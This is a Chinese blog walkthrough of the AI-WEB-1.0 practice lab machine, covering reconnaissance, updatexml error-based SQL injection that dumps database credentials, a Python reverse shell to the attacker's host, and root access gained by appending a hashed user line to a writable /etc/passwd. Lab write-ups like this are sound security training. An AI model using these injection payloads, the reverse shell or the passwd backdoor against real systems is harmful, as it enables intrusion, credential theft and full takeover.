AI-WEB-1.0

最新推荐文章于 2024-02-25 10:12:39 发布
最新推荐文章于 2024-02-25 10:12:39 发布
阅读量586 收藏 1
点赞数 2
分类专栏: OSCP靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lonelyhat/article/details/119360031
版权

总结:

  1. 报错注入常见的十种,本次用的是updatexml
  2. 获取os-sh的条件,具有可写权限的绝对路径需要自己拼接
  3. 使用openssl passwd -1 salt xxx xxx构造hash

目标主机为192.168.49.158

攻击kali机为192.168.49.129

前期的信息收集,端口服务,目录扫描,web框架等

端口服务:

只开放80端口且存在两个目录

访问web页面,使用nikto和dirb针对主机和目录进行探测:

主页和前端源码没有提供信息

查看下目录扫描结果:

以及nikto针对主机扫描的结果:

目前还是打开web页面的robots.txt查看有没有可以利用的信息:

存在两个目录,依次访问查看页面:

http://192.168.49.158/m3diNf0/

这个页面是403但是我们可以继续对二级目录进行扫描,发现info.php目录

在info.php页面中出现phpinfo配置页面:

http://192.168.49.158/se3reTdir777/uploads/依然是403,根据路径可以看出这是个文件上传的目录,这个路径是可以写入的。

返回上一级发现存在数据交互的地方:

http://192.168.49.158/se3reTdir777/#

疑似SQL注入点,使用bp抓包进行测试:

芜湖,手注一波~

语句闭合uid=1'+--+&Operation=Submit

是存在报错注入,常见的报错注入有十种,这里我用的是updatexml报错

uid=1'and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#&Operation=Submit

获取当前数据库aiweb1,用户名以及路径

通过数据库找到表

uid=1'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#&Operation=Submit

找到两张表,其中systemUser表存在数据

查找systemUserb表中的字段名

uid=1'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='systemUser')),1)#&Operation=Submit

找到两个关键字段userName,password

查询数据

uid=1'and updatexml(1,concat(0x7e,(select group_concat(userName,0x7e,password) from aiweb1.systemUser)),1)#&Operation=Submit

XPATH syntax error: '~t00r~RmFrZVVzZXJQYXNzdzByZA==,a'

Base64解密一下

t00l   FakeUserPassw0rd

问题来了,他只开放了80没有ssh,而且web没有登陆页面,我为什么不sqlmap直接—os-sh,而是在这里搞手注?

使用ossh最重要的几点:

  1. 需要知道网站的路径
  2. 路径要求可写权限
  3. 也就是要有注入点

通过报错注入和info.php页面都出现了网站路径

uid=1'and updatexml(1,concat(0x7e,@@datadir),1)#&Operation=Submit

路径1:~/var/lib/mysql/

路径2:

/home/www/html/web1x443290o2sdf92213

路径3:

http://192.168.49.158/se3reTdir777/uploads/

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

 

这里使用路径3,1和2都没有写入的权限,而路径3是文件上传的路径存在写入权限的。

本地的绝对路径:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

我不太习惯使用sqlmap里面的ossh所以我准备使用python的反弹shell,本地使用nc监听接收反弹shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(('192.168.49.129',9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

进行本地的提权:

查看到/etc/passwd文件是www权限可以进行读写的

使用openssl配置一个hash的密码

openssl passwd -1 -salt ceshi 111111

构造语句然后追加到后面

echo 'ceshi:$1$ceshi$qnAnyuPt51g8P1T0QL5Ju1:0:0::/root:/bin/bash' >> /etc/passwd

su ceshi直接切换到root权限下的bash

梵歆
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
聊天留言Luo-book 1.0-luobook.rar
04-07
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2362
AI-WEB-1.0靶机的简单攻略
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 2486
AI-WEB-1.0 多方法渗透
AI时代的Web开发:让Web开发更轻松
2301_81940605的博客
02-25 1137
人工智能(AI)具有改变我们生活的潜力,因为它可以接管那些单调、乏味的任务,这些工作通常会占用我们宝贵的时间和精力。
Ai-web-1.0靶机中的骚操作
weixin_51692662的博客
11-05 314
sqlmap、反弹shell、passwd提权、Ai-web-1.0
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6068
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2135
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
交友会员TechWeb同事录UCH调查插件 v1.0-uch-vote-1.0.rar
04-09
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
聊天留言橡皮泥留言 v1.0-liuyan1.0.rar
04-09
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
上传下载铁人下载系统 Liuxing 1.0-liuxing1.0.rar
04-08
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
CMS程序BBBC-CMS v1.0-bbbc-cms.rar
最新发布
04-09
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
云尘靶场-AI-Web-1.0
2202_75317918的博客
11-21 134
还是先用fscan来扫c段访问一下/robots.txt访问一下看看 ,不能访问删掉/upload输个1 试试1' 发现报错了这里我们可以发现是post传参,那么sqlmap执行POST注入的方式这里检查网络,看请求,可以看到传参放到sqlmap说明存在sql注入这里没有flag,也不懂有什么用访问另一个看看也是打不开,用dirsearch扫一下看看。
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 348
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
vulnhub靶场渗透系列-- AI:web:1
lza20001103的博客
10-02 3606
AI:web:1 文章目录AI:web:1前言靶机地址工具、知识点和漏洞存疑、待解决一、信息收集二、SQL注入三、提权file-dest 写入 webshellFind SUID添加用户名密码到/etc/passwd后记 前言 前面给大家讲解了外网和内网渗透的相关知识和技术,以及各种工具的使用,在我们渗透中都会遇到,接下来我们需要进行靶场的练习和渗透了,这也是一个提升渗透能力的方法,这里给大家推荐几个比较好的额靶场,vulnhub和红日靶场(http://vulnstack.qiyuanxuetang.ne
AI-Web-1 靶场
weixin_46044002的博客
06-23 229
还记的之前出现的phpinfo页面吗?页面中暴露了网站的绝对路径,那我们就可以利用sqlmap拿shell。显示中有一个什么什么uploads,一个文件上传的目录。emmm,我直呼好家伙,这不是相当于还是啥也没有。一样的,环境搭好了,但是啥也没有,先找他的ip。我把靶机环境移除,在重新打开,页面出来了。得到数据,但都不是靶机的登录信息。有个info.php访问看看。
vulnhub靶机AI-WEB-1.0渗透测试
Long_gone的博客
09-29 1549
首先用netdiscover工具扫描一下靶机IP: netdiscover 由经验推断出靶机IP为:192.168.34.228,接着使用nmap工具扫描一下靶机端口的开放情况: nmap -sV -p 0-65535 192.168.34.228 发现靶机只开放了80端口,然后访问一下看看: 然后试一下目录爆破: dirb http://192.168.34.228 发现robot...
VulnHub靶场之AI Web 1.0
A_dmin的博客
05-20 553
VulnHub靶场之AI Web 1.0 废话不多说,直接开始实验,都是老套路起步了 用vm打开靶机,运行kali和靶机 首先肯定查看kali的ip地址,然后使用nmap命令:nmap -sP 192.168.80.0/24扫描主机: 找到了靶机的IP地址,接下来进行端口扫描 nmap命令:nmap -p 1-65535 -sV 192.168.80.129 发现只开了一个80端口,我们进行访...
vulnhub之AI-Web-1.0
m_de_g的博客
04-27 600
linux。
web3.0和web2.0的区别
02-07
它将使用人工智能技术,如机器学习和自然语言处理,来提供个性化的内容和服务。 - Web 3.0 更加强调数据隐私和安全。它将使用加密技术来保护用户的个人信息,并通过区块链技术来提供数据的可信性。 - Web 3.0 更加...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值